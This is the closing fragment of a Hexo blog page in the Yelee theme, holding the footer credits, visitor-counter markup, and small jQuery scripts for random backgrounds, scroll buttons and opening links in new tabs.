                <a href="http://hexo.io/" target="_blank" title="快速、简洁且高效的博客框架">Hexo</a>  Theme <a href="https://github.com/MOxFIVE/hexo-theme-yelee" target="_blank" title="简而不减 Hexo 双栏博客主题  v3.5">Yelee</a> by MOxFIVE <i class="fa fa-heart animated infinite pulse"></i>
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style="display:none">
                        <span id="site-visit" title="本站到访数"><i class="fa fa-user" aria-hidden="true"></i><span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>| </span>
                
                
                    <span id="busuanzi_container_page_pv" style="display:none">
                        <span id="page-visit" title="本页阅读量"><i class="fa fa-eye animated infinite pulse" aria-hidden="true"></i><span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>
    </div>
    
<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.2.0/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 3;
                var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#" title="返回顶部"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="查看评论"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="转到底部"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
        var oOpenInNew = {
            
            
            
            
            
            
             archives: ".archive-article-title", 
             miniArchives: "a.post-list-link", 
            
             friends: "#js-friends a", 
             socail: ".social a" 
        }
        for (var x in oOpenInNew) {
            $(oOpenInNew[x]).attr("target", "_blank");
        }
    
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
  </div>
</body>
</html>